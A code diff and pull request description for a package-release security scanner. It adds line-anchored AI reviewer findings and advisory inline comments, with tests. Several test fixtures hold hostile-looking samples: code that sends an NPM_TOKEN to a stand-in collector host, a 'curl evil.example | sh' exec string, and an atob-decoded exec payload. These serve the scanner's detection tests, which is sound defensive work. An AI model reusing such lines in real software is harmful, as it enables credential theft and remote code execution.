@@ -182,6 +183,39 @@ export default function ScanDetailPage() {
       all.filter((item) => item.finding.file === path).map((item) => item.finding),
     );
   });
+
+  // The assistant's inline comments for the open file, as diff annotations.
+  // Advisory notes, not signals: they ride the same pinning machinery as
+  // findings but stay out of the risk-signals index and the tree counts below,
+  // because nothing about them moves the release verdict.
+  const selectedComments = useComputed<DiffFinding[]>(() => {
+    const path = model.selectedPath.value;
+    const result = ai.value;
+    if (!path || result?.kind !== "complete") return [];
+    return result.comments.flatMap((comment, index) =>
+      comment.file === path
+        ? [
+            {
+              // Index-based: comments have no persisted identity of their own,
+              // and the array is stable for a given scan.
+              id: `ai-comment-${index}`,
+              severity: "info",
+              line: comment.line ?? null,
+              reason: comment.note,
+              source: "ai",
+              kind: "comment" as const,
+            },
+          ]
+        : [],
+    );
+  });
+
+  // Findings first, comments after, so a line carrying both leads with the
+  // signal and follows with the commentary.
+  const selectedAnnotations = useComputed(() => [
+    ...selectedFindings.value,
+    ...selectedComments.value,
+  ]);
 
   // Per-file finding counts for the tree, built once from the same finding set
   // that feeds the inline annotations and the risk-signals index.
@@ -410,7 +444,7 @@ export default function ScanDetailPage() {
                   compareLoading={compareLoading}
                   selectedVersion={selectedVersion}
                   stagedVersion={detail.scan.stagedVersion}
-                  findings={selectedFindings.value}
+                  findings={selectedAnnotations.value}
                 />
               </Card>
             </section>

--- a/test/ai-review-anchors.test.mjs
+++ b/test/ai-review-anchors.test.mjs
@@ -1,0 +1,74 @@
+import { describe, expect, test } from "vitest";
+import { anchorCandidates, resolveAnchorLine } from "../server/lib/ai-review/anchors";
+
+const SOURCE = [
+  "const https = require('https');",
+  "",
+  "function send(payload) {",
+  "  const token = process.env.NPM_TOKEN;",
+  "  return https.request('https://collector.example/ingest', payload, token);",
+  "}",
+  "",
+  "module.exports = { send };",
+].join("\n");
+
+describe("resolveAnchorLine", () => {
+  test("pins a verbatim line to its 1-based line number", () => {
+    expect(resolveAnchorLine(SOURCE, "  const token = process.env.NPM_TOKEN;")).toBe(4);
+  });
+
+  test("ignores indentation, which diff rendering does not preserve", () => {
+    expect(resolveAnchorLine(SOURCE, "const token = process.env.NPM_TOKEN;")).toBe(4);
+  });
+
+  test("strips a leading unified-diff marker copied out of the read tool", () => {
+    expect(resolveAnchorLine(SOURCE, "+  const token = process.env.NPM_TOKEN;")).toBe(4);
+  });
+
+  test("prefers a literal match over the marker-stripped reading", () => {
+    const text = ["  args.push('-force');", "  args.push('force');"].join("\n");
+    expect(resolveAnchorLine(text, "-force');")).toBe(1);
+  });
+
+  test("matches a clipped anchor by containment", () => {
+    expect(resolveAnchorLine(SOURCE, "https.request('https://collector.example")).toBe(5);
+  });
+
+  test("refuses an anchor that matches more than one line", () => {
+    const text = ["value = 1;", "value = 1;"].join("\n");
+    expect(resolveAnchorLine(text, "value = 1;")).toBeNull();
+  });
+
+  test("refuses an anchor with no identity of its own", () => {
+    expect(resolveAnchorLine(SOURCE, "}")).toBeNull();
+    expect(resolveAnchorLine(SOURCE, "   ")).toBeNull();
+  });
+
+  test("refuses a line the model never saw", () => {
+    expect(resolveAnchorLine(SOURCE, "exec('curl evil.example | sh')")).toBeNull();
+  });
+
+  test("returns null for missing text or a missing anchor", () => {
+    expect(resolveAnchorLine(null, "const https = require('https');")).toBeNull();
+    expect(resolveAnchorLine(SOURCE, undefined)).toBeNull();
+    expect(resolveAnchorLine("", "const https = require('https');")).toBeNull();
+  });
+});
+
+describe("anchorCandidates", () => {
+  test("offers the literal form first and the marker-stripped form second", () => {
+    expect(anchorCandidates("-  rm -rf /tmp/cache")).toEqual([
+      "-  rm -rf /tmp/cache",
+      "rm -rf /tmp/cache",
+    ]);
+  });
+
+  test("offers one form when there is no marker to strip", () => {
+    expect(anchorCandidates("  const x = 1;")).toEqual(["const x = 1;"]);
+  });
+
+  test("drops forms below the signal floor", () => {
+    expect(anchorCandidates("+ }")).toEqual([]);
+    expect(anchorCandidates(null)).toEqual([]);
+  });
+});

--- a/test/ai-review.test.mjs
+++ b/test/ai-review.test.mjs
@@ -12,6 +12,7 @@ import {
 import {
   buildReviewerSystemPrompt,
   MAX_AGENT_STEPS,
+  MAX_AI_COMMENTS,
   MAX_AI_FINDINGS,
   normalizeAiReviewEcosystem,
 } from "../server/lib/ai-review/contract";
@@ -685,6 +686,120 @@ describe("ai review orchestration", () => {
   });
 });
 
+describe("anchored findings and inline comments", () => {
+  const INDEX_JS = [
+    "const https = require('https');",
+    "",
+    "function collect() {",
+    "  return process.env.NPM_TOKEN;",
+    "}",
+    "",
+    "module.exports = { collect };",
+  ].join("\n");
+
+  const ANCHOR_OPTIONS = {
+    ...BASE_OPTIONS,
+    files: [
+      { path: "index.js", size: INDEX_JS.length, sha256: "abc", textSample: INDEX_JS, flags: [] },
+    ],
+    diff: [{ path: "index.js", status: "modified", flags: [] }],
+  };
+
+  async function reviewWith(submission) {
+    const { review } = await analyzeWithAi(
+      {},
+      "mock-reviewer",
+      ANCHOR_OPTIONS,
+      submittingModel({ ...VALID_REVIEW, ...submission }),
+    );
+    return review;
+  }
+
+  test("resolves a finding's anchor to a staged line and drops the anchor itself", async () => {
+    const ai = await reviewWith({
+      risk: "high",
+      releaseAssessment: "suspicious",
+      findings: [
+        {
+          ...aiFinding("high", "package/index.js"),
+          anchor: "  return process.env.NPM_TOKEN;",
+        },
+      ],
+      requiresManualReview: true,
+    });
+
+    // The path is normalized to the form the diff and file tree use, so the
+    // workbench can match the finding to the open file.
+    expect(ai.findings[0].file).toBe("index.js");
+    expect(ai.findings[0].line).toBe(4);
+    expect(ai.findings[0]).not.toHaveProperty("anchor");
+  });
+
+  test("keeps a finding whose anchor does not match, with no line", async () => {
+    const ai = await reviewWith({
+      risk: "high",
+      releaseAssessment: "suspicious",
+      findings: [
+        {
+          ...aiFinding("high", "index.js"),
+          anchor: "exec('curl evil.example | sh')",
+        },
+      ],
+      requiresManualReview: true,
+    });
+
+    expect(ai.findings).toHaveLength(1);
+    expect(ai.findings[0].line).toBeNull();
+  });
+
+  test("pins comments to their line and leaves risk untouched", async () => {
+    const ai = await reviewWith({
+      comments: [
+        { file: "index.js", anchor: "const https = require('https');", note: "Unchanged import." },
+      ],
+    });
+
+    expect(ai.comments).toEqual([{ file: "index.js", note: "Unchanged import.", line: 1 }]);
+    // A note is not a signal: it cannot move the release verdict.
+    expect(computeScanRisk([], ai)).toBe("low");
+  });
+
+  test("keeps a real-file comment whose anchor is unusable, unpinned", async () => {
+    const ai = await reviewWith({
+      comments: [{ file: "index.js", anchor: "}", note: "Closes the collector." }],
+    });
+
+    expect(ai.comments).toEqual([{ file: "index.js", note: "Closes the collector.", line: null }]);
+  });
+
+  test("drops a comment on a file this review never saw", async () => {
+    const ai = await reviewWith({
+      comments: [
+        { file: "vendor/ghost.js", anchor: "const https = require('https');", note: "Invented." },
+      ],
+    });
+
+    expect(ai.comments).toEqual([]);
+  });
+
+  test("caps comments at MAX_AI_COMMENTS", async () => {
+    const ai = await reviewWith({
+      comments: Array.from({ length: MAX_AI_COMMENTS + 2 }, (_, index) => ({
+        file: "index.js",
+        anchor: "const https = require('https');",
+        note: `note ${index}`,
+      })),
+    });
+
+    expect(ai.comments).toHaveLength(MAX_AI_COMMENTS);
+  });
+
+  test("a submission without comments completes with an empty list", async () => {
+    const ai = await reviewWith({});
+    expect(ai.comments).toEqual([]);
+  });
+});
+
 describe("displayedAiResult", () => {
   test("returns null when no review is provided", () => {
     expect(displayedAiResult(null)).toBeNull();
@@ -762,6 +877,9 @@ describe("displayedAiResult", () => {
           recommendation: "review manually",
         },
       ],
+      // The input above omits `comments`, as every record written before
+      // inline comments existed does; the accessor fills the empty list.
+      comments: [],
       requiresManualReview: true,
     });
   });

--- a/test/diff-annotations.test.ts
+++ b/test/diff-annotations.test.ts
@@ -55,6 +55,17 @@ describe("annotationLabel", () => {
   test("returns null when neither part is present", () => {
     expect(annotationLabel({ ruleId: null, line: null })).toBeNull();
   });
+
+  test("captions an assistant finding by origin, since it has no ruleId", () => {
+    expect(annotationLabel({ ruleId: null, line: 9, source: "ai" })).toBe("assistant · line 9");
+  });
+
+  test("leaves an assistant comment's origin to its badge", () => {
+    expect(annotationLabel({ ruleId: null, line: 9, source: "ai", kind: "comment" })).toBe(
+      "line 9",
+    );
+    expect(annotationLabel({ ruleId: null, line: null, source: "ai", kind: "comment" })).toBeNull();
+  });
 });
 
 describe("partitionFindingsByLine", () => {

--- a/test/review.test.mjs
+++ b/test/review.test.mjs
@@ -974,6 +974,48 @@ describe("review", () => {
     });
   });
 
+  test("scopes AI findings by file, ignoring their anchored line", () => {
+    // An AI finding's line comes from matching an anchor the reviewer copied,
+    // so it can legitimately sit on an untouched line while the concern is about
+    // the file the release changed. Scoping it by that line would drop the
+    // finding out of the release bucket the workflow gate reads.
+    const previous = [
+      {
+        path: "src/server.ts",
+        size: 60,
+        sha256: "old",
+        flags: [],
+        textSample: "fetch('/existing-risk');\nexport const value = 1;\n",
+      },
+    ];
+    const staged = [
+      {
+        path: "src/server.ts",
+        size: 60,
+        sha256: "new",
+        flags: [],
+        textSample: "fetch('/existing-risk');\nexport const value = 2;\n",
+      },
+    ];
+    const annotated = annotateFindingsWithDiffStatus(
+      [
+        {
+          id: "ai-unchanged-line",
+          severity: "high",
+          file: "src/server.ts",
+          line: 1,
+          source: "ai",
+          evidence: "network-capable code path",
+          reason: "exfiltration shape",
+        },
+      ],
+      createPackageDiff(previous, staged),
+      { previousFiles: previous, stagedFiles: staged },
+    );
+
+    expect(annotated[0]).toMatchObject({ diffStatus: "modified", releaseDelta: true });
+  });
+
   test("classifies manifest-diff dependency findings as release delta regardless of line", () => {
     // These rules are derived from the previous-vs-staged manifest diff, so they
     // are release-scoped by construction; they must not fall through to the

--- a/test/workers/ai-finding-persistence.test.ts
+++ b/test/workers/ai-finding-persistence.test.ts
@@ -47,6 +47,9 @@ const aiFindingRecord: Finding = {
   file: "setup.js",
   evidence: "child_process.exec(atob(payload))",
   reason: "decodes and executes a staged payload during install",
+  // Resolved from the submitted anchor, so an AI finding pins to its hunk in
+  // the workbench exactly like a deterministic one.
+  line: 1,
 };
 
 const completeAiReview = {
@@ -61,8 +64,10 @@ const completeAiReview = {
       evidence: "child_process.exec(atob(payload))",
       reason: "decodes and executes a staged payload during install",
       recommendation: "block the release",
+      line: 1,
     },
   ],
+  comments: [{ file: "index.js", note: "Unrelated fetch, unchanged since 0.1.0.", line: 1 }],
   requiresManualReview: true,
   model: "test-model",
 };
@@ -115,7 +120,7 @@ describe("AI finding persistence (D1 degraded path)", () => {
       severity: "critical",
       file: "setup.js",
       evidence: "child_process.exec(atob(payload))",
-      line: null,
+      line: 1,
       ruleId: null,
       ruleVersion: null,
     });
@@ -221,6 +226,9 @@ describe("AI finding persistence (R2 artifact path)", () => {
     expect(aiDetail).toMatchObject({
       severity: "critical",
       file: "setup.js",
+      // Same line the D1 path persists: both stores project the review through
+      // projectAiReviewFindings, so a pinned finding survives either store.
+      line: 1,
       diffStatus: "added",
       releaseDelta: true,
     });

--- a/test/workers/scan-report-export.test.ts
+++ b/test/workers/scan-report-export.test.ts
@@ -245,8 +245,10 @@ describe("scan report JSON export", () => {
           evidence: "postinstall runs node install.js",
           reason: "consumer installs execute arbitrary code",
           recommendation: "remove the install hook or gate it behind a manual step",
+          line: 12,
         },
       ],
+      comments: [{ file: "index.js", note: "The retry loop is unrelated to the hook.", line: 4 }],
       requiresManualReview: true,
       model: "ai-review-1",
     } as const;
@@ -266,10 +268,12 @@ describe("scan report JSON export", () => {
         findings: Array<{
           severity: string;
           file: string;
+          line: number | null;
           evidence: string;
           reason: string;
           recommendation: string;
         }>;
+        comments: Array<{ file: string; line: number | null; note: string }>;
       } | null;
     };
 
@@ -284,11 +288,13 @@ describe("scan report JSON export", () => {
         {
           severity: "critical",
           file: "package.json",
+          line: 12,
           evidence: "postinstall runs node install.js",
           reason: "consumer installs execute arbitrary code",
           recommendation: "remove the install hook or gate it behind a manual step",
         },
       ],
+      comments: [{ file: "index.js", line: 4, note: "The retry loop is unrelated to the hook." }],
     });
 
     // Stable serialization: a re-export of the same evidence is byte-identical.
@@ -319,6 +325,7 @@ describe("scan report JSON export", () => {
         releaseAssessment: string | null;
         requiresManualReview: boolean;
         findings: unknown[];
+        comments: unknown[];
       } | null;
     };
 
@@ -330,6 +337,7 @@ describe("scan report JSON export", () => {
       releaseAssessment: null,
       requiresManualReview: false,
       findings: [],
+      comments: [],
     });
   });
 


### PR DESCRIPTION
## Summary

The AI reviewer could only report whole-file findings, so every assistant signal landed in the diff's unpinned banner rather than on the hunk that triggered it, and observations below critical/high vanished into summary prose. It now submits an `anchor` — a line copied verbatim from the evidence it was served — which `server/lib/ai-review/anchors.ts` resolves to a line number by unique match against the same text sample; it never states a line number, because the evidence tools serve unnumbered text and a mis-pinned finding points a maintainer at innocent code while exonerating the guilty line. Findings carry the resolved line through both stores into `scan_findings.line` so they pin like deterministic ones, and a review may additionally return up to six severity-free `comments` pinned to a line, persisted in `scans.ai_json` and rendered in the diff with a neutral badge and the info tone. Comments are advisory only: never `scan_findings` rows, never counted into `finding_count`, and unable to move risk.

## Trust boundary

The AI trust boundary. Anchors are lookup keys, not coordinates: an anchor that misses, matches several lines, or is too generic resolves to no line and falls back to the existing banner, and a comment naming a file the review could not see is dropped. A resolved line is display only — `annotateFindingsWithDiffStatus` ignores it for `source: "ai"` findings, so a whole-file concern anchored to an untouched line cannot fall out of the release bucket `releaseRisk` and the workflow gate read (regression test in `test/review.test.mjs`). Deterministic findings are untouched and the reviewer still cannot downgrade them.

## Verification

`pnpm run verify` passes (lint, format check, typecheck, 1633 tests). New coverage: `test/ai-review-anchors.test.mjs` for anchor resolution and its fail-closed cases, anchor/comment normalization end-to-end in `test/ai-review.test.mjs`, AI-source release-delta scoping in `test/review.test.mjs`, line round-trip across the D1 and R2 stores in `test/workers/ai-finding-persistence.test.ts`, and the report-export shape. E2E was not run — the fake-registry path has no Flagship binding, so AI review never executes there.

## Documentation

`docs/release-safety.md` (anchor contract, comment guarantees) and `docs/ui.md` (new "Diff annotations" section covering all three annotation kinds).

## UI evidence

Not captured: rendering assistant comments requires a completed Workers AI review, which the local/e2e path does not run. The comment callout reuses the existing pinned-finding component with a neutral `assistant note` badge and the info-tone fill; the assistant-finding caption change is covered by `test/diff-annotations.test.ts`.